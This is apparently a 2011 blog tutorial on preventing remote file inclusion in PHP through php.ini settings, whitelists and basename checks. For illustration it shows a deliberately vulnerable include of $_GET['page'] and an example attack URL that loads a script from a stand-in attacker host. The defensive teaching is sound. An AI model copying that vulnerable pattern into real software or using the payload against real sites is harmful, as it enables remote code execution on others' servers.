How To: Prevent Remote File Inclusion Exploits in PHP

Keywords: php, exploit, script, kiddies, remote, file, inclusion, remote file inclusion, basename, file_exists, white list, list, include, require, require_once, include_once, allow_url_fopen, fopen, file_get_contents, prevention, precaution, security, help, howto

For years now I have participated in many coding forums, and perhaps the biggest issue I see is people using $_GET (or another unfiltered variable) inside an include, include_once, require, or require_once statement. This is a major security risk, and in an attempt to steer people away from it I have accumulated several ways it can be done "properly" (I quote "properly" because each person has their own preference). Let's get down to the nitty gritty and see how we can do inclusions in PHP securely, without opening ourselves up to a remote file inclusion exploit.

First Things First
Most PHP hosts set allow_url_fopen to Off by default, in an effort to help prevent these exploits. However, not every host does this, and not everyone uses a shared host. If you are on a VPS or a dedicated server, you may have inadvertently enabled this setting, or simply never disabled it. So first things first: find the php.ini file your server actually loads, and turn it off (along with allow_url_include, available as of PHP 5.2). If you relied on fopen or file_get_contents for remote files, I would highly suggest switching over to cURL; it gives you much finer control over remote requests, and it keeps remote fetching separate from inclusion in case you did not write all the code on your site, or you run a mainstream package like WordPress that may contain a vulnerability anyone could find.
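For reference, the relevant php.ini directives look like this (allow_url_include only exists on PHP 5.2 and later):

```ini
; Disallow fopen()/file_get_contents() on remote URLs
allow_url_fopen = Off
; PHP 5.2+: specifically blocks include/require of remote URLs
allow_url_include = Off
```

Remember to restart your web server (or PHP-FPM) after editing php.ini, and verify the change with phpinfo() or `php -i`.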

Implementing a White List
A common piece of exploitable code that I have seen looks basically like this:


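A minimal sketch of that vulnerable pattern, assuming a `page` query string parameter:

```php
<?php
// DO NOT use this: $_GET['page'] is attacker-controlled and goes
// straight into include with no validation whatsoever.
include $_GET['page'];
```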
If your host has allow_url_fopen enabled, you are just asking to be hit with a remote file inclusion exploit. Anyone could pass something like ?page=http://attackersite.example/evilscript.txt and, voilà, their code is executed remotely, and your site is fully opened up to them. As you can see, this is a huge issue, and it is how a lot of malware and viruses get passed around. Implementing a white list is about as close to a surefire way of preventing this as you will get. The array can come from any source you like: hard-coded in the file, from a database setting, etc. I am just going to write it inline for simplicity.

    $whiteList = array('index' => 'index.php', 'about' => 'about.php', 'contact' => 'contact.php');
    if (!empty($_GET['page']) && array_key_exists($_GET['page'], $whiteList)) {
        include $whiteList[$_GET['page']];
    } else {
        // default it
        include $whiteList['index'];
    }
As you can see, everything is hard coded, and there is no way for someone to inject their own URL into your site. This prevents any type of remote file inclusion exploit from being performed. If you wanted more "security," you could give the files obscured names, or include them from a directory outside the webroot so that no one could access them directly. This is generally my preferred method, simply because the chance of being remotely exploited through it is slim to none.

Using basename and file_exists
Another method uses basename and file_exists. I find this method a bit less secure, since a visitor can include any file as long as it exists in the target directory. What basename does is strip everything but the file's name. This prevents someone from entering something like ../../somefile and having that file included; if your permissions were not set up properly, a traversal like that could expose SSH keys, logs, and other files you do not want out in the open. The file_exists call makes sure the file actually exists on the server, as an extra precaution. Let's see the code for this method:

    $file = 'your/path/to/file/' . basename($_GET['page']);
    if (file_exists($file)) {
        include $file;
    } else {
        // fall back to a default page
        include 'your/path/to/file/index.php';
    }
For this method, I showed an example of including from a path other than the webroot. This helps prevent people from simply probing for different files, and you can place the pages in their own directory so that only pages meant to be included are included; e.g., you could have a 'pages' directory and keep them organized in there. If you use this method, I would highly recommend using a pages directory or similar.
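To firm that up a little, here is a hedged sketch of the basename approach with a dedicated pages directory. The directory location, the appended .php extension, and the index.php fallback are my assumptions for illustration, not fixed requirements:

```php
<?php
// Sketch: confine includes to a pages/ directory outside the webroot,
// then verify the resolved path really lives inside it.
$pagesDir = realpath(__DIR__ . '/../pages'); // assumed location
$page     = isset($_GET['page']) ? basename($_GET['page']) : 'index';
$file     = realpath($pagesDir . '/' . $page . '.php');

// realpath() returns false for missing files, and the prefix check
// rejects anything that resolved outside the pages directory.
if ($file !== false && strpos($file, $pagesDir . DIRECTORY_SEPARATOR) === 0) {
    include $file;
} else {
    include $pagesDir . '/index.php'; // default page
}
```

Appending the extension yourself means only .php files inside that one directory can ever be included, which closes off probing for logs, configs, or anything else that happens to exist.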

Other Methods
I am sure there are plenty of other methods (I saw one person using base64), but these are the two I primarily recommend, for their simplicity. My preferred method overall is basename with a pages directory outside the webroot: it masks the pages, makes it harder to probe for them, and removes the risk of a file accidentally being included when it should not be. If you have other methods, feel free to post them in the comments.

Finishing Touch
This is just one step you can take to secure your site from being exploited by what we call script kiddies and the like. On its own it will not completely secure your site, so you will of course need to take precautions in every other area as well. However, if pulling up pages dynamically via the URL appeals to you, these methods will help you avoid being exploited through a remote file inclusion exploit.

As always, I welcome comments that are not trolling or flaming. I will remove any flaming or trolling comments, so please leave constructive feedback; all I am attempting to do here is educate users. If you feel I am wrong, tell me constructively, with proof and ways to fix it. Thanks, and hopefully this has helped you!

Posted by frost on Jun 15th, 2011 20:29
